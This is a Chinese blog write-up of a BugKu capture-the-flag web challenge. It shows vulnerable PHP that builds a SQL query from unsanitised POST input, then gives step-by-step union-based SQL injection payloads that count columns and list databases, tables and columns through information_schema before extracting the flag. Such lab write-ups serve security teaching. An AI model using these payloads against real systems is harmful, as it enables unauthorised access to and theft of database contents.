BugKu学生成绩查询 详解 SQL注入

最新推荐文章于 2024-06-03 21:49:45 发布
最新推荐文章于 2024-06-03 21:49:45 发布
阅读量2k 收藏 2
点赞数
分类专栏: 数据库 WEB渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yyyyyywly/article/details/90312145
版权

根据测试,源代码伪代码如下:

<?php

//链接数据库
mysql_connet("[datebase]","[user]","[password]") or
//检查错误,处理无法访问数据库的情况
die("Could not connect:" . mysql_error());

//选择数据库
mysql_select_db("[database_name]");

//从POST请求中获取id的值
$id = $_POST["id"];

//创建并执行一条SQL语句
$result = mysql_query("SELECT * from ".$TableName."where id = '$id' ");

?>

1’ order by 4#返回正常,
输入1’ order by 5#返回异常。
(按照sql的语法#起注释作用,所以#后面的单引号就被注释掉了)
当数字等于5的时候报错,
那说明当前表只有4个字段并且只有4列。

接下来就开始暴库名、表名、字段名。

首先爆库名:通过id=-1’ union select 1,2,3,database()#
执行的SQL语句:
SELECT * from “.$TableName.”
where id = ‘-1’ union
select 1,2,3,database()#’

database()将会返回当前网站所使用的数据库名字
user()将会返回执行当前查询的用户名
version() 获取当前数据库版本

得到数据库名字skctf_flag

然后爆表:
information_schema 是 MySQL 自带的一张表,
这张数据表保存了 MySQL 服务器所有数据库的信息,
如数据库名,数据库的表,表栏的数据类型与访问权限等。
该数据库拥有一个名为 tables 的数据表,
该表包含两个字段 table_name 和 table_schema,
分别记录 DBMS 中的存储的表名和表名所在的数据库。

group_concat语法:
功能:将group by产生的同一个分组中的值连接起来,返回一个字符串结果。

通过使用
id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

执行的SQL语句:
SELECT * from “.$TableName.”
where id = ‘-1’ union
select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#’

得到表名:fl4g,sc

接下来暴字段:
通过id=-1’ union select 1,2,3,group_concat(column_name)
from information_schema.columns
where table_name=‘fl4g’#

得到字段skctf_flag

查询数据,通过使用:
id=-1’ union select 1,2,3,skctf_flag from fl4g#

得到flag

你愿意和我一起清理内存吗?
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一次简单的sql注入 bugku 成绩查询
jzw0831的博客
11-06 1118
一次简单的sql注入 bugku 成绩查询
【CTF bugku 成绩查询】关于sql注入
zw05011的博客
01-17 634
知识点 sql注入基础原理(超详细) - 简书一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最...https://www.jianshu.com/p/078df7a35671通过1和1'查看返回值,确定注入 通过1' order by 1#、1' order by 2#直到确定为几列 通过联合查询 1' union select database(),user()#进行查询
bugku 成绩查询
m0_73721944的博客
12-22 381
这意味着 -d "skctf" 这部分的语法有问题。但报错了(看别人的wp爆出的库是skctf_flag,不知道为什么,我查询语句时也是skctf)按照我查询到的库skctf,字段skctf_flag。一个数据库skctf(估计flag就在里面)skctf中只有两个表 fl4g,sc。大佬的wp确实有,也许是现在做了修改。我想用下面的语句爆skctf中的库。说明库确实是skctf_flag。所以skctf_flag是表?得到了两个表,fl4g和sc。爆出了三个库,五十三个表。发现了一个库skctf。
Bugku---web---成绩查询
最新发布
weixin_47450099的博客
06-03 547
sql注入相关知识,内有各种爆破语句
bugku-writeup-web-成绩查询
dark的博客
06-16 227
bugku-web成绩查询解题思路记录。” 题目:
web安全入门之SQL注入-报错型注入
weixin_43726831的博客
09-12 1154
SQL注入之报错型注入法 1.报错型注入分析 报错型注入法适用于无回显数据的场景,适合于没有显示位的web页面,但是有mysql报错输出的场景。metasploitable2-Linux在Less-5和Less-6中就用到了报错型注入方法 这种页面有明显的三种场景 场景1:正确查询成功场景为结果显示。 场景2:正确查询失败场景为空,不显示。 场景3:错误语句查询场景,显示报错语句。 在这种情况下...
bugku-web-成绩查询
qq_75121443的博客
04-01 396
这里是一个post请求,必定连接数据库,可以尝试sql注入。联合查询注入得到当前权限账号、库名、MySQL版本号。首先注入点确定,这里有4个注入点。得到字段skctf_flag
SQL注入之基于布尔的盲注详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
mybatis防止SQL注入的方法实例详解
08-27
MyBatis 防止 SQL 注入的方法实例详解 SQL 注入是一种简单的攻击手段,但直到今天仍然十分常见。MyBatis 作为一个流行的持久层框架,如何防止 SQL 注入呢?下面我们将详细介绍 MyBatis 防止 SQL 注入的方法实例详解...
php+mysql学生成绩查询
05-02
【PHP+MySQL学生成绩查询系统详解】 在IT领域,PHP和MySQL是两个非常重要的工具,常用于构建动态网站和数据库管理系统。本项目是一个基于PHP和MySQL的学生成绩查询系统,适用于学习者进行实践操作和理解Web开发的...
SQL注入思路详解
12-14
1. **联合查询注入(Union Query)**:通过`UNION`操作合并两个或更多查询的结果,直接展示数据库中的数据。 2. **报错注入(Error Based)**:利用错误信息泄露数据库信息,如MySQL的`information_schema.tables`。...
详解SQL注入–安全(二)
01-19
一、前面学习的SQL注入,那么当然就有防注入。由于web注入危害较大,各种防御技术也层出不穷。 1、程序猿在写代码时会有意识的进行防御设置,或者安全测试来封堵web注入 2、各大安全厂商生产的硬件或者软件WAF产品 ...
bugku--成绩查询
hxhabcd123的博客
08-28 1480
该题记录暴力破解依次破解数据库名、表名、字段名、字段内容的解题过程,以及采用sqlmap工具解题
Bugku 成绩查询【WEB】
soysauce123的博客
08-15 463
今天咱们尝试用一下一个新的工具,sqlmap,这是一个用于sql注入等等相关的一个很不错的工具。大家好,作为一个CTF方面的小白,以后我也希望每做一次题目就和大家分享分享自己的解题过程。我们都清楚http的请求方式有两种一个get,一个post,这里就是post。那现在这就是里面最后的文件里,【确信】flag肯定就在里面了打开他!然后这里我们是用登陆框的形式输入的,我们就可以想到post登陆框注入。看看找到了啥,四个库~~就我分析这个ctf就很显眼,我估计就是这个嘿嘿。然后就可以开始查询了,先搜索库。...
BUGKU-成绩查询
m0_64180167的博客
12-03 919
打开环境 随便输入 发现URL 不传参 怀疑是POST型于是我们查看源代码发现是POST型打开终端因为是POST型 所以有两种方式语法:sqlmap -r "txt地址"kali中要下载数据包 我们在物理windows系统上的BP进行抓取 打包成文件然后把后缀改成.txt 通过共享文件传输到kali中,或者直接从桌面拖到kali桌面中打开sqlmap运行指令sqlmap -r "bugku.txt"于是我们开始爆破库sqlmap -r "bugku.txt" --tables 把库名和表名爆出来了然后我们发
Bugku-成绩查询
qq_56611811的博客
05-17 423
进入题目差不多能够猜到是关于sql注入的题,1'没有返回结果,1'#能够成功查询,这说明注释符是有效果的。2.当num是5时无法回显内容,说明表可能有4列。
Bugku成绩查询:一次简单的SQL注入过程
xhxtalent的博客
10-20 513
1很重要,一般来说在数据库中id不会有等于负数的,所以union联合查找前面部分的是错误的,故就是显示后面的查询内容,不然不会显示后面的查询内容的。一共查询到两个表名,分别是fl4g和sc表,我们需要但是flag,很大概率在fl4g表中,所以优先查询fl4g表的内容。查询到字段名为“skctf_flag”,那么就直接查询该字段的数据就能得到想要的了。and 1=2返回错误了,说明存在注入点的。递增上去,如果页面如果出现了错误,那么字段数就是当前的数字减1。分别输入1,2,3返回的是不同人名的成绩单。
bugku成绩单(sql注入)writeup
热门推荐
xuchen16的博客
09-20 1万+
解法一:手工注入 输入1,2,3分别能查到1,2,3号学生的成绩   SQL注入应该没跑了   输入1'返回异常,输入1'--+返回异常,输入1' #或者1’-- +返回正常,看来过滤了--+   观察,表貌似有四列(名字,Math,English,Chinese),输入1' order by 4#返回正常,输入1' order by 5#返回异常,看来的确是4列   接下来就开始暴库名...
bugkuCTF学生成绩查询writeup----sqlmap注入
qq_41492160的博客
12-08 2174
1.题目 2.查看是否存在注入漏洞 测试:如果id=1后面加‘ 不正常 加-- l恢复正常,说明存在数字型漏洞            两个都不正常说明不存在数字型注入           如果  id=1后面接 and  0   页面没有内容 and  1  页面正常显示内容说明有数字型漏洞           如果都不正常说明没有数字型漏洞 3.存在漏洞找注入点 使用burpsui...
SQL注入攻击技术详解
如果`and1=1`时网页正常,而`and1=2`时网页异常,这可能表明系统在构建SQL查询时未正确过滤用户输入,可能存在注入风险。 接着,文档展示了如何猜解数据库中的表名和列名。在ACCESS数据库中,由于没有提供直接的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值